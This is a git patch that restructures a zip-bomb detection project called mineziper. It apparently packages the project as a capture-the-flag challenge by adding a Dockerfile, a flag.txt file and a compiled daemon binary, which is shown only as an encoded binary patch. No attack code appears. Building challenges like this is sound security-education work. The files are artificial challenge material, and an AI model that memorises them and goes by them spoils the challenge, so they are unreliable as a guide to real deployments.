From 81b8cd5c94ef863a7a99d318870a5d6da29f0122 Mon Sep 17 00:00:00 2001 From: atxr Date: Fri, 1 Mar 2024 10:45:54 +0100 Subject: [PATCH 01/10] Refactor project --- Dockerfile | 20 ++++++++++++++++++ README.md | 4 ---- dist/mineziperd | Bin 0 -> 54688 bytes flag.txt | 1 + .../mineziper/CMakeLists.txt | 0 src/mineziper/README.md | 4 ++++ .../mineziper/libmineziper}/CMakeLists.txt | 0 .../libmineziper}/include/libmineziper.h | 0 .../include/libmineziper_bitstream.h | 0 .../include/libmineziper_crypto.h | 0 .../include/libmineziper_huffman_tree.h | 0 .../libmineziper}/include/libmineziper_zip.h | 0 .../libmineziper}/src/libmineziper.c | 0 .../src/libmineziper_bitstream.c | 0 .../libmineziper}/src/libmineziper_crypto.c | 0 .../src/libmineziper_huffman_tree.c | 0 .../libmineziper}/src/libmineziper_zip.c | 0 .../mineziper/mineziper}/CMakeLists.txt | 0 .../mineziper/mineziper}/mineziper.c | 0 .../mineziper/mineziper}/mineziperd.c | 0 {tests => src/mineziper/tests}/CMakeLists.txt | 0 .../mineziper/tests}/test_decode_fixed_tree.c | 0 .../tests}/test_decode_huffman_tree.c | 0 {tests => src/mineziper/tests}/test_get_cdh.c | 0 {webapp => src/webapp}/app.py | 0 {webapp => src/webapp}/static/space.jpg | Bin {webapp => src/webapp}/static/styles.css | 0 {webapp => src/webapp}/templates/index.html | 0 28 files changed, 25 insertions(+), 4 deletions(-) create mode 100644 Dockerfile create mode 100755 dist/mineziperd create mode 100644 flag.txt rename CMakeLists.txt => src/mineziper/CMakeLists.txt (100%) create mode 100644 src/mineziper/README.md rename {libmineziper => src/mineziper/libmineziper}/CMakeLists.txt (100%) rename {libmineziper => src/mineziper/libmineziper}/include/libmineziper.h (100%) rename {libmineziper => src/mineziper/libmineziper}/include/libmineziper_bitstream.h (100%) rename {libmineziper => src/mineziper/libmineziper}/include/libmineziper_crypto.h (100%) rename {libmineziper => src/mineziper/libmineziper}/include/libmineziper_huffman_tree.h (100%) rename {libmineziper => src/mineziper/libmineziper}/include/libmineziper_zip.h (100%) rename {libmineziper => src/mineziper/libmineziper}/src/libmineziper.c (100%) rename {libmineziper => src/mineziper/libmineziper}/src/libmineziper_bitstream.c (100%) rename {libmineziper => src/mineziper/libmineziper}/src/libmineziper_crypto.c (100%) rename {libmineziper => src/mineziper/libmineziper}/src/libmineziper_huffman_tree.c (100%) rename {libmineziper => src/mineziper/libmineziper}/src/libmineziper_zip.c (100%) rename {mineziper => src/mineziper/mineziper}/CMakeLists.txt (100%) rename {mineziper => src/mineziper/mineziper}/mineziper.c (100%) rename {mineziper => src/mineziper/mineziper}/mineziperd.c (100%) rename {tests => src/mineziper/tests}/CMakeLists.txt (100%) rename {tests => src/mineziper/tests}/test_decode_fixed_tree.c (100%) rename {tests => src/mineziper/tests}/test_decode_huffman_tree.c (100%) rename {tests => src/mineziper/tests}/test_get_cdh.c (100%) rename {webapp => src/webapp}/app.py (100%) rename {webapp => src/webapp}/static/space.jpg (100%) rename {webapp => src/webapp}/static/styles.css (100%) rename {webapp => src/webapp}/templates/index.html (100%) diff --git a/Dockerfile b/Dockerfile new file mode 100644 index 0000000..06d79ba --- /dev/null +++ b/Dockerfile @@ -0,0 +1,20 @@ +FROM ubuntu:22.04 + +RUN apt-get update + +RUN useradd -m -s /bin/bash user + +USER user +WORKDIR /home/user + +COPY dist/mineziperd . +COPY webapp . +COPY flag.txt . + +RUN ./mineziperd & + +WORKDIR /home/user/webapp +RUN pip install -r requirements.txt + +ENTRYPOINT [ "python3" ] +CMD [ "app.py" ] diff --git a/README.md b/README.md index 8b01e2c..e69de29 100644 --- a/README.md +++ b/README.md @@ -1,4 +0,0 @@ -# mineziper 💣 -### A Minesweeper for zip files! - -Detect zip bombs based on overlapping files. diff --git a/dist/mineziperd b/dist/mineziperd new file mode 100755 index 0000000000000000000000000000000000000000..e5a94e1b8bd1c7dc97cc31f4918b1093e117ca36 GIT binary patch literal 54688 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 